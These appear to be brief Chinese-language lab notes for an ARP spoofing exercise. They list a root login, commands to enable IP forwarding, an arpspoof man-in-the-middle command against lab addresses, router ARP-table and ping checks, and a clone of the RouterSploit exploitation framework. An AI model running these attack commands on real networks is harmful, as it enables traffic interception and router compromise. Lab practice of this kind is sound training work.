Last updated 4 years ago
Was this helpful?
登入 Linux 帳號密碼
user:root password
Linux 開啟路由轉發功能
echo 1 >> /proc/sys/net/ipv4/ip_forward
檢查
cat /proc/sys/net/ipv4/ip_forward
Linux 启动 Arpspoof 注入攻击目标系统
arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
Window
arp ?
顯示路由器的位址解析協議列表
show arp
show arp 同等 show ip arp
ping VPC IP
ping 192.168.1.1
開啟 Linux 並 ping 外部網路
ping 8.8.8.8
網路連接測試
ping www.google.com
網站開啟測試
下載 RouterSploit
git clone https://github.com/reverse-shell/routersploit